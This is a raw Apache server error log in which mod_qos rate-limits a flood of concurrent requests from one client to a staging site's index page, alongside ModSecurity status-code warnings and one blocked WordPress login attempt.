[Tue May 26 19:59:09.839912 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqJQAAAHE
[Tue May 26 19:59:09.964062 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqJwAAACw
[Tue May 26 19:59:09.964077 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqKAAAABc
[Tue May 26 19:59:09.966857 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqKQAAAG4
[Tue May 26 19:59:09.976481 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNUqK9k_ZUB2Vp250HQAAAaw
[Tue May 26 19:59:09.978563 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqKgAAAFA
[Tue May 26 19:59:09.982055 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNWDRMqfxdEDkoszqKwAAAGU
[Tue May 26 19:59:10.125639 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250JQAAAak
[Tue May 26 19:59:10.125671 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250JgAAAcQ
[Tue May 26 19:59:10.126835 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqMgAAAFI
[Tue May 26 19:59:10.126914 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqMQAAAA0
[Tue May 26 19:59:10.127496 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqMwAAADc
[Tue May 26 19:59:10.129942 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqNAAAAAs
[Tue May 26 19:59:10.131190 2026] [qos:error] [pid 93868:tid 94280] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250JwAAAaU
[Tue May 26 19:59:10.131272 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqNQAAAC0
[Tue May 26 19:59:10.132801 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqNgAAAAI
[Tue May 26 19:59:10.135480 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqNwAAAFw
[Tue May 26 19:59:10.275006 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zZAAAAc8"]
[Tue May 26 19:59:10.280048 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqOgAAABQ
[Tue May 26 19:59:10.280427 2026] [qos:error] [pid 93868:tid 94320] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250LQAAAc0
[Tue May 26 19:59:10.281060 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqOwAAAAM
[Tue May 26 19:59:10.282259 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqPAAAADk
[Tue May 26 19:59:10.282480 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszpuQAAACU"]
[Tue May 26 19:59:10.288617 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250MQAAAbg
[Tue May 26 19:59:10.289474 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqPwAAAFk
[Tue May 26 19:59:10.291346 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszp1wAAAFc"]
[Tue May 26 19:59:10.291595 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zYwAAAY8"]
[Tue May 26 19:59:10.304899 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zewAAAgQ"]
[Tue May 26 19:59:10.305054 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zcgAAAbk"]
[Tue May 26 19:59:10.305886 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszp3AAAAHw"]
[Tue May 26 19:59:10.310797 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszpuAAAAEM"]
[Tue May 26 19:59:10.315928 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszptwAAAFY"]
[Tue May 26 19:59:10.321028 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszpsgAAAHM"]
[Tue May 26 19:59:10.331544 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zkQAAAeo"]
[Tue May 26 19:59:10.337928 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zkAAAAcE"]
[Tue May 26 19:59:10.340272 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zmAAAAck"]
[Tue May 26 19:59:10.353991 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zcwAAAcg"]
[Tue May 26 19:59:10.356036 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z3gAAAcY"]
[Tue May 26 19:59:10.356924 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zkwAAAgk"]
[Tue May 26 19:59:10.361720 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z2gAAAfI"]
[Tue May 26 19:59:10.363098 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zlwAAAdc"]
[Tue May 26 19:59:10.365935 2026] [security2:error] [pid 93576:tid 93733] [client 31.57.184.20:63141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pgcsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWuNmDRMqfxdEDkoszqQwAAABU"], referer: https://www.bing.com/
[Tue May 26 19:59:10.381730 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z3AAAAa0"]
[Tue May 26 19:59:10.382743 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNEqK9k_ZUB2Vp25zkgAAAZU"]
[Tue May 26 19:59:10.387522 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z3QAAAfE"]
[Tue May 26 19:59:10.391865 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z2wAAAbw"]
[Tue May 26 19:59:10.396146 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z4gAAAbQ"]
[Tue May 26 19:59:10.398736 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNGDRMqfxdEDkoszp3wAAAGM"]
[Tue May 26 19:59:10.399250 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z5AAAAeM"]
[Tue May 26 19:59:10.414519 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszp-wAAABo"]
[Tue May 26 19:59:10.416583 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z6AAAAZQ"]
[Tue May 26 19:59:10.417418 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z5wAAAbA"]
[Tue May 26 19:59:10.421490 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z7gAAAc4"]
[Tue May 26 19:59:10.429230 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z7QAAAdQ"]
[Tue May 26 19:59:10.429549 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z4wAAAdA"]
[Tue May 26 19:59:10.431640 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszp_AAAABw"]
[Tue May 26 19:59:10.432375 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszp_gAAAGg"]
[Tue May 26 19:59:10.433062 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z6wAAAZ0"]
[Tue May 26 19:59:10.560874 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuNkqK9k_ZUB2Vp250eAAAAgE
[Tue May 26 19:59:10.576841 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqZgAAAHw
[Tue May 26 19:59:10.577510 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqZwAAAFs
[Tue May 26 19:59:10.577700 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250ewAAAe4
[Tue May 26 19:59:10.578523 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqaAAAAEM
[Tue May 26 19:59:10.579366 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250fAAAAgk
[Tue May 26 19:59:10.581241 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqaQAAAE8
[Tue May 26 19:59:10.582872 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqagAAADE
[Tue May 26 19:59:10.584970 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqawAAAFY
[Tue May 26 19:59:10.587046 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqbAAAADo
[Tue May 26 19:59:10.715510 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250gwAAAZ0
[Tue May 26 19:59:10.727170 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250hAAAAZI
[Tue May 26 19:59:10.728459 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqbwAAAGY
[Tue May 26 19:59:10.728732 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqcAAAAGA
[Tue May 26 19:59:10.730569 2026] [qos:error] [pid 93868:tid 94367] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250hQAAAfw
[Tue May 26 19:59:10.732210 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqcQAAAEI
[Tue May 26 19:59:10.732822 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqcgAAAC8
[Tue May 26 19:59:10.732870 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqcwAAAEI
[Tue May 26 19:59:10.738489 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqdQAAAGQ
[Tue May 26 19:59:10.742290 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqdgAAABM
[Tue May 26 19:59:10.870113 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250jAAAAfA
[Tue May 26 19:59:10.876470 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNkqK9k_ZUB2Vp250jQAAAaQ
[Tue May 26 19:59:10.876946 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuNmDRMqfxdEDkoszqfAAAAH8
[Tue May 26 19:59:11.165102 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuN2DRMqfxdEDkoszqgwAAAB8
[Tue May 26 19:59:11.166126 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuN2DRMqfxdEDkoszqhAAAAF4
[Tue May 26 19:59:11.167358 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuN0qK9k_ZUB2Vp250lwAAAeE
[Tue May 26 19:59:11.170070 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuN2DRMqfxdEDkoszqhQAAAGM
[Tue May 26 19:59:11.171693 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuN2DRMqfxdEDkoszqhgAAACo
[Tue May 26 19:59:11.172683 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuN2DRMqfxdEDkoszqhwAAACo
[Tue May 26 19:59:11.281687 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszp9gAAAAw"]
[Tue May 26 19:59:11.285836 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszqAgAAAE4"]
[Tue May 26 19:59:11.288800 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z7wAAAZc"]
